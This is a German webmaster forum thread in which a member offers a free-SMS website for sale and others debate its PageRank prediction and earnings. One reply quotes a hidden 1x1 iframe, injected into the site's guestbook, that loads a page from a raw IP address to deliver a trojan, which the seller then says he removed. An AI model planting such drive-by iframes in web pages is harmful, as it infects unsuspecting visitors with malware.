[V]erkaufe PR-3 Projekt (PR-5 vorrausgesagt)

DerKlack

Aktives Mitglied
Guten Abend,

ich verkaufe meine Free-SMS-Seite Free-Simsen.net, da ich keine Zeit & Lust mehr habe das Projekt zu bewerben. Es wird die Domain und die Seite/Inhalt verkauft.

Paar Fakten:
- täglich werden 50-150 SMS verschickt
- seit März online
- Besucherstatistiken
- Pagerank 3
- laut ecombiz wird ein Pagerank von 5 vorrausgesagt
- laut Linkvendor 1461 Backlinks (7xPR1 9xPR2 11xPR3 7xPR4)
- z.B unter den Keywords simsen, free simsen, kostenlos simsen, gratis simsen in den TOP10 bei Google

Wer Interesse oder Fragen hat, bitte bei mir melden :) Unter dreistellig brauch niemand ankommen. Ich weiß, dass diese Seite mit der überall vorhandenen SMS-Box keine Meisterleistung ist, aber mit den vielen Backlinks und dem hohen Pagerank hat man schon eine gute Startposition für weitere Google-Optimierung.

Gruß
 
Hallo, diese Vorhersagen sind natürlich nicht 100%ig sicher, allerdings haben sie sich bei mir immer als richtig erwiesen. Mindestens PR4 wird es auf jeden Fall, da ich relativ viele Backlinks nach der Pagerank-Aktualisierung gesammelt habe.
 
Ich kann nur lachen, seit einigen Monaten treffe ich immer wieder auf solche Angebote, bei ayom auch, wenigstens 3 Mal. Mit immer derselben Begründung - keine Zeit. Die Strategie scheint immer dieselbe zu sein, Skript bei ebay ersteigern, ein bisschen Links setzen, verkaufen. Aber ich habe praktisch nie gesehen das man freiwillig bekannt gibt wie viel man damit verdient
wink.gif


@Matthias
QUOTE Wie sicher sind die Vorhersagen?

Ich lach mich kaputt, war das ein Witz?
biggrin.gif
Findest du selber die Frage nicht komisch?
biggrin.gif
 
Ich finde es ehrlich gesagt ein bisschen frech, dass man mein Post ins Lächerliche zieht, obwohl er überhaupt nicht lächerlich gemeint war
smile.gif
Ich weiß, dass der Pagerank einer Seite garnicht soviel Aussagekraft hat, wie gut die Seite denn nun ranked, allerdings schauen viele trotzdem darauf und deswegen habe ich dies mit angeführt! Und mit der Vorhersage war auch nur eine zusätzliche Information, die natürlich nicht stimmen muss oder wird das Wetter bei euch, wie man es im TV einen Tag zuvor vorhersagt? - Dreht mir bitte nicht jedes Wort im Mund rum
smile.gif


@VoinG: Und ich kann seit einigen Monaten immer wieder über solche Postings lachen, weil sie manchmal total aus der Luft geholt sind.
1. Ich habe kein Script bei eBay ersteigert oder Ähnliches. Der Anbieter SMS-Box.de stellt solch eine SMS-Box zur Verfügung, die man nur noch einbauen muss. Wenn du sehen möchtest, was die Seite eingebracht hat, dann schick mir eine PN und ich schick dir die Umsätze, die mit dem Layer-Anbieter und Adsense erziehlt wurden. In den letzten 10 Tagen, waren es ca. 9 Dollar durch Adsense.
2. Nein, ich hatte eigentlich keine Strategie vor. Ich habe wirklich keine Zeit, weil ich an einem größeren Projekt arbeite und dafür noch ein bisschen Kapital brauche. Du musst es mir ja nicht glauben und du musst mir die Seite auch nicht abkaufen, aber lass Neulingen eine Chance, auch wenn sie keine SEO-Experten sind.

Gruß
 
Sorry, wenn das wirklich so ist, nehme ich meine Worte sehr gerne zurück!

Das ist natürlich nicht schlecht, dass du auch eine Vorhersage mit anführst, mich hat nur die Frage von Matthias zum Lachen gebracht
smile.gif

Du musst aber auch verstehen, man trifft auf so viele betrügerischen Angebote, dass z.B. ich vom Anfang an kritisch eingestellt bin, insbesondere wenn man nicht direkt alle Angaben macht..

Viel Erfolg auf jeden Fall!
 
Wenn dir eine Angabe fehlt, kannst du ja nachfragen
wink.gif


Adsense:
Link gelöscht

Bin-Layer:
Link gelöscht


Vielleicht bist du / seid ihr ja jetzt nicht mehr so kritisch gegenüber meinem Angebot eingestellt. Ich weiß, dass das keine nennenswerten Einnahmen sind, aber ich verlange für das Projekt ja auch kein utopischen Preis.
 
Die PR-Vorhersage ist ungefähr so richtig wie Weltuntergangsvorhersagen von Scientology. Totaler Schwachsinn. Wenn's danach ginge hätte ich auf einigen Seiten mit vielen starken Links (PR5-8) einen PR von 3-4.

Ehrlich gesagt würde mich ein Threadtitel "Verkaufe Projekt inkl 1 Tüte Gummibärchen" mehr ansprechen. Von den Gummibärchen hätte ich mehr als von einem PR 3
laugh.gif


Ich find den inflationären Verkauf von Free SMS Seiten derzeit schade, z.Zt. wird ja eine Seite nach der anderen hochgezogen, mit ein paar Backlinks und einer Hand voll Besucher versorgt und weg damit auf eBay & co
blink.gif
(@DerKlack nichts gegen dich
wink.gif
)

Achja, eCPM, CTR und Anzahl Klicks von Google dürfen nicht veröffentlicht werden.
 
QUOTE @Matthias
QUOTE
Wie sicher sind die Vorhersagen?

Ich lach mich kaputt, war das ein Witz? Findest du selber die Frage nicht komisch?

Ein Schmunzeln hätte gereicht - hältst Du mich wirklich für so bescheuert?
unsure.gif
 
Warum befindet sich in deinem Gästebuch ein unsichtbarer Frame, der mir einen Trojaner unterschieben will?
mad.gif

QUOTE </html>

<iframe src='http://81.95.149.28/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
 
@Christian:
1. Das mit der Vorhersage hatten wir doch längst geklärt, dass dort nicht immer ein 100%iges Ergebnis entstehen kann, auch wenn es bei mir der Fall war. Es ist auch klar, dass ich mit dem (PR-5 vorrausgesagt) Threadtitel Käuferinteresse wecken will - Wer macht das nicht?

2. Evtl. sauer, weil deine Besucher zu anderen SMS-Seiten abspringen, weil der Service dort ohne Anmeldung verfügbar steht? Ich habe das Ding echt anfänglich sehr stark beworben und sogar eine kleine Handycommunity aufgebaut. Leider wurde die Seite dann 2mal gehacked, da Joomla voller Sicherheitslücken ist.

@Matthias:
Kannst du meinen Thread bitte nicht mit deinem unlustigen Offtopic beschmutzen? - Danke
smile.gif


@Simon: Oh, danke für die Info. Ich hatte damals einen Trojaner auf der ganzen Seite. Hatte alle infizierten Dateien editiert nur diese hattei ch vergessen. Müsste jetzt wieder alles in Ordnung sein.

Gruß.
 
Zwischen nicht 100%ig und gewürfelt ist noch ein kleiner Unterschied
wink.gif
Versuchs doch mal mit dem Backlinkchecker von internetbaron, der ist um einiges zuverlässiger bzgl. der PR-Prognose. Vorhersage bei free-simsen.net: PR3.

QUOTE Evtl. sauer, weil deine Besucher zu anderen SMS-Seiten abspringen, weil der Service dort ohne Anmeldung verfügbar steht?
Ist zwar ziemlich OT, aber nö. Bei mir ist's doch auch ohne Anmeldung, und die Besucher springen auch nicht ab
smile.gif
 
@DerKlack

du weisst aber schon das der service den du bei dir verbaut hast dem christian leo gehört `? *g*

deine besucher sind also im groben auch seine besucher
wink.gif


und pr 3/10 ist unteres drittel also nicht hoch sondern eher sehr niedrig

trozdem viel erfolg beim verkauf deiner seite

gruß
Thomas

achja Edith wollt noch wissen was der höchstpreis bisher ist evtl hat sie interesse
 
QUOTE Kannst du meinen Thread bitte nicht mit deinem unlustigen Offtopic beschmutzen? - Danke

Hast Du etwas viel Spinat gegessen?
wink.gif
Ich bin angesprochen worden und habe geantwortet, dies werde ich auch in Zukunft so halten.

Wünsche Dir in jedem Fall viel Erfolg beim Verkauf!
 
Zurück
Oben